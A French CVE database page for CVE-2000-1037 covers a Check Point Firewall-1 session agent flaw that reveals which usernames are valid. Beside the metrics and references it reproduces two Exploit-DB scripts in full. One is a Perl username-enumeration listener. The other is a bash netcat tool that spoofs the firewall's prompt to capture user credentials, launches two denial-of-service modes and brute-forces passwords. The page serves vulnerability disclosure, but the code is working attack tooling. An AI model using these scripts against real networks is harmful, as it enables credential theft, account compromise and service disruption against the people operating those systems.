CVE-2000-1037 : Détail

CVE-2000-1037

1.15%V3
Network
2000-11-29
04h00 +00:00
2003-03-21
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Check Point Firewall-1 session agent 3.0 through 4.1 generates different error messages for invalid user names versus invalid passwords, which allows remote attackers to determine valid usernames and guess a password via a brute force attack.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20215

Date de publication : 2000-08-14 22h00 +00:00
Auteur : Nelson Brito
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/1662/info A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password. #!/usr/bin/perl -w # # File : brute-fw1-agent.pl # Author: Nelson Brito<nelson@secunet.com.br || nelson@sekure.org> # # Untested code, use on your own risc. # use Socket; $c = 0; $port = 261; #$proto = getprotobyname('tcp'); socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket:$!"; setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(FAGENT, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(FAGENT, SOMAXCONN) or die "listen: $!"; open(SDI, "users") or die "open: $!\n"; until(eof(SDI)){ $user = <SDI>; chomp($user); next if ($user=~/^\s*#/); next if ($user=~/^\s*$/); push @users, $user; } close(SDI); while(accept(MODULE, FAGENT)){ LINE: $c++; print STDOUT "[+] Hii... I'm on TV $c times!\n"; recv(MODULE, $target, 1024, 0); if($target=~/^331/i){ chomp($users[0]); send(MODULE, "$users[0]\n", 0); recv(MODULE, $target, 1024, 0); if($target=~/^220/){ recv(MODULE, $target, 1024, 0); if($target=~/^530/){ shift @users; goto LINE; }else{ die "[-] Unknow code. What happened?\n"; } }elsif($target=~/^331/){ print STDOUT "[+] The $users[0] username is right!\n"; }else{ die "[-] Uknow return code. What happened?\n"; } }else{ die "[-] Unknow return code. What happened?\n"; } }
Exploit Database EDB-ID : 20216

Date de publication : 2000-09-30 22h00 +00:00
Auteur : Gregory Duchemin
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/1662/info A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password. #!/bin/bash # # Fwsa (FW-1 session auth), tested on linux 2.4.0 beta # ( Swiss army knife for FW-1 Session authentication. ) # # successfully tested against Session Authentication Agents 4.0 & 4.1 # and Firewall-1 module 4.0 # # please don't use it for any illegal activity but only for educational purposes # # Gregory Duchemin ( aka c3rb3r ) # # for help or bug report <==> c3rb3r@hotmail.com # 0ctober 2000 function Usage() { echo echo " Usage: "$0" Targets_filez type_of_attack [FQDN name] [dict file] [0/1/2/3]" echo echo "================proof of concept // Version 1.0 ===" echo "===================================================" echo echo " Note: Targets_filez is a plaintext file with all IPs to check" echo " I recommend u to make it with the help of Nmap " echo " Try nmap -T Insane -sS -P0 -p 261 RANGE_IP to look for listening session agents." echo " Note: Type of attack is 1 for password recovery, 2 for stupid DOS, 3 for " echo " dangerous DOS and 4 for bruteforcing users password on Firewall" echo echo " * password recovery will turn you back user FW1 login/password" echo " * stupid DOS just open a connexion and wait for nothing" echo " It'll block all other connexion and so, user access." echo " * dangerous DOS will enter an infinite loop within it send garbage." echo " Will crash some weak systems. ( find wich ones ;) ) " echo " * passwords Brute-force try to guess users password onto " echo " the corporate firewall. Have to supply an external address in filez" echo " to force firewall to connect on local port ( port 261 )." echo echo " Note: FQDN name is Fully Qualified Domain name, default:firewall used for FW-1 " echo " banner." echo " Note: Change the internal variables filez and logfile to store your stock into, default:\"...\"" echo " Note: this proggy needs netcat to nicely work." echo echo " G00d Hunt !" echo echo " author: Gregory Duchemin ( aka c3rb3r )" echo " c3rb3r@hotmail.com " echo echo " N0 c0pyright, feel free to use or modify it as u want" echo } signal_handler() { sync echo echo "Warning: target aborted, continuing with next one..." echo echo } filtered() { echo echo "Error: target port 261 doesn't respond" echo " it should be because target is filtering or is down." echo " Anyway, try again spoofing firewall address." echo " Arptool should be helpfull to do the job" echo } closed() { echo echo "Error: target port 261 is closed" echo " continuing with next ip." echo echo } simple_dos() { for i in $ip; do echo echo "***********************************************" echo "Launching stupid DOS attack against "$i" !" echo "***********************************************" echo echo { sleep $timeout sync }| nc -n -w 2 -v $i 261 > $logfile 2>&1 if [ `awk '{ print $7 }' $logfile` = "refused" ]; then closed else if [ `awk '{ print $7 }' $logfile` = "timed" ]; then filtered fi fi done rm $logfile echo echo "DOS terminated. ( Hope it's ok)" echo } dangerous_dos() { for i in $ip; do echo echo "****************************************************" echo "Launching dangerous DOS attack against "$i" !" echo "****************************************************" echo echo { sleep $timeout cat /dev/random }| nc -n -w 2 -v $i 261 > $logfile 2>&1 if [ $( awk '{ print $7 }' $logfile) = "refused" ]; then closed else if [ $(awk '{ print $7 }' $logfile) = "timed" ]; then filtered fi fi done rm $logfile echo echo "DOS terminated. ( Hope it's ok)" echo } password_recovery() { for i in $ip; do echo echo "*****************************************************" echo "Launching FW1 password recovery against "$i" !" echo "*****************************************************" echo echo { sleep $timeout sync cat /dev/null > $logfile echo "220 FW-1 Session Authentication Request from "$name echo "211 253141732 1988 3931424644 80 5" echo "331 User:" sync # synchronisation of buffers and disks while [ ! -s $logfile ]; do # waiting for user info supply in logfile sleep 1 done user=$(cat $logfile) echo "331 *Firewall-1 password:" while [ `wc -l $logfile|awk '{ print $1 }'` -eq 1 ]; do sleep 1 done sed 's/'$user'//' $logfile | sed '/./,$!d' > ./tmp password=$(cat ./tmp) rm ./tmp echo "200 User $user authenticated by Firewall-1 authentication." echo "230 OK" sleep 2 echo >> $filez echo >> $filez echo "===== Password recovery ============================================" >> $filez echo "====================================================================" >> $filez echo " Target <==> $i" >> $filez echo >> $filez echo " Username <==> $user Password <==> $password" >> $filez echo >> $filez echo >> $filez exit 0 }| nc -n -w 2 -v $i 261 > $logfile if [ -f ./tmp ]; then rm tmp fi done if [ -f $logfile ]; then rm $logfile fi echo echo "Done. ( see "$filez" to read stolen informations)" echo } password_bruteforce() { for i in $ip; do echo echo "*****************************************************" echo "Launching FW1 password BruteForce attack " echo "*****************************************************" echo echo if [ -s $logfile ]; then cat /dev/null > $logfile fi # We use as many char string as there are in password because # most of the time, admin won't use a "real" random generator but # a program that use a basic scheme. # if u understand this scheme and modify the string below, u should be able to increase significantly your chances of succeed. # if passwords in your company are less than 8 chars, comment useless lines # password scheme: # for instance, first letter could be uppercase ( A or H string depending on order byte ). # initial values are commented #A='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' A='A B C D E F G H I J K L M N O P Q R S T U V W X Y Z' B='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' C='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' D='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' E='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' F='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' G='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' H='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0' { # we send a probe to anywhere in the world port 80 (or whatever fw rules allow), waiting for FW answer nc -w 2 -n $i 80 > /dev/null 2>&1 # waiting for invitation caller grep 331 $logfile > /dev/null while [ $? -eq 1 ]; do grep 331 $logfile > /dev/null done # we try now our login names until we get back the magic cookie # actually we read login names in a file, it should be more efficient since most of admins use real names. # u can use brute force to guess login in the same manner we use it for passwords. # in this case, just change the few lines below to use chars strings from 1 up to 8 loops. for user in $username do cat /dev/null > $logfile sync echo $user # 530 eg NOTOK, error response # fw1 session authentication reply with an error code if username doesn't exist, that's a flaw in itself. sleep $timeout grep 530 $logfile > /dev/null if [ $? -eq 1 ]; then echo "===== Password Brute force ============================================" >> $filez echo "====================================================================" >> $filez echo >> $filez echo >> $filez echo " login ok :"$user >> $filez echo >> $filez echo >> $filez echo $user >> ./.users sync continue fi done if [ ! -f ./.users ]; then exit fi targets=`cat ./.users` rm ./.users # Now it's time we try to guess password for this user # if passwords in your company are less than 8 chars, comment useless loops. for user in $targets do for i8 in $H do for i7 in $G do # this rule is optional if [ $i7 = $i8 ]; then continue fi for i6 in $F do # this rule is optional if [ $i6 = $i7 ]; then continue fi for i5 in $E do # this rule is optional if [ $i5 = $i6 ]; then continue fi for i4 in $D do # this rule is optional if [ $i4 = $i5 ]; then continue fi for i3 in $C do # this rule is optional if [ $i3 = $i4 ]; then continue fi for i2 in $B do # this rule is optional if [ $i2 = $i3 ]; then continue fi for i1 in $A do # this rule is optional if [ $i1 = $i2 ]; then continue fi # waiting for server grep 331 $logfile > /dev/null while [ $? -eq 1 ]; do grep 331 $logfile > /dev/null done # order is fetched by the user (see usage), and may be usefull for multi-process bruteforce. if [ $order -eq 0 ]; then echo $i1$i2$i3$i4$i5$i6$i7$i8 # for debugging purpose echo "trying $i1$i2$i3$i4$i5$i6$i7$i8" >> $filez else if [ $order -eq 1 ]; then echo $i1$i7$i6$i5$i4$i3$i2$i8 echo "trying $i1$i7$i6$i5$i4$i3$i2$i8" >> $filez else if [ $order -eq 2 ]; then echo $i1$i5$i8$i2$i4$i7$i3$i6 echo "trying $i1$i5$i8$i2$i4$i7$i3$i6" >> $filez else echo $i1$i2$i4$i7$i8$i3$i6$i5 echo "trying $i1$i2$i4$i7$i8$i3$i6$i5" >> $filez fi fi fi sync usleep $utimeout # 230 eg OK, password is correct grep 230 $logfile > /dev/null if [ $? -eq 0 ]; then echo >> $filez if [ $order -eq 0 ]; then echo "password ok :"$i1$i2$i3$i4$i5$i6$i7$i8 >> $filez else if [ $order -eq 1 ]; then echo "password ok :"$i8$i7$i6$i5$i4$i3$i2$i1 >> $filez else if [ $order -eq 2 ]; then echo "password ok :"$i8$i5$i1$i2$i4$i7$i3$i6 >> $filez else echo "password ok :"$i2$i1$i4$i7$i8$i3$i6$i5 >> $filez fi fi fi echo >> $filez echo >> $filez exit fi # we r supposed to reinject username each time, this one we just discovered # but connexion is still alive that's the major flaw. grep 331 $logfile > /dev/null while [ $? -eq 1 ]; do grep 331 $logfile > /dev/null done echo $user done done done done done done done done done }| nc -n -l -p 261 > $logfile 2>&1 #if [ -f $logfile ]; then #rm $logfile #fi done echo echo "Done. ( see "$filez" to read stolen informations)" echo } if [ $# -lt 2 ]; then Usage exit fi nc -h > /dev/null 2>&1 if [ ! $? -eq 1 ]; then Usage echo echo echo "Error: "$0" needs netcat to properly run, please check u have it in your \$PATH or compile it now." echo exit fi if [ ! $2 -eq 1 ] && [ ! $2 -eq 2 ] && [ ! $2 -eq 3 ] && [ ! $2 -eq 4 ]; then Usage echo echo echo "Error: Value for type of attack is out of range." echo exit fi if [ ! -s $1 ]; then Usage echo echo echo "Error: "$0" didn't find your Targets_ip filez." echo exit fi trap signal_handler SIGINT ip=`cat $1` # filez is where results are writen, please change it for your configuration # don't forget to change this values for every instance of the process, u would like to launch filez="./......" logfile="./logfile4" cat /dev/null > $filez name="fwl01" # timeout is connexion timer when waiting for a server response. timeout=2 # utimeout is pretty important, specifically for brute force attack, lower value means faster loop but if too low, fw reply would be mistaken # that depends of your network round trip time and average firewall cpu usage. # try different values first: default 22 millisecond utimeout=22000 if [ $# -gt 2 ]; then name=$3 fi if [ $# -gt 2 ] && [ $2 -eq 4 ]; then if [ ! -s $3 ]; then Usage echo echo "Error: "$0" didn't find your dict filez or it's empty." echo exit fi username=`cat $3` fi order=0 if [ $# -gt 3 ]; then order=$4 fi if [ -f $logfile ]; then rm -f $logfile fi case "$2" in 1) password_recovery ;; 2) simple_dos ;; 3) dangerous_dos ;; 4) password_bruteforce if [ -s $filez ]; then cat $filez fi ;; *) exit 1 esac exit

Products Mentioned

Configuraton 0

Checkpoint>>Firewall-1 >> Version 3.0

Checkpoint>>Firewall-1 >> Version 4.0

Checkpoint>>Firewall-1 >> Version 4.1

Références

http://www.securityfocus.com/bid/1662
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/76389
Tags : mailing-list, x_refsource_BUGTRAQ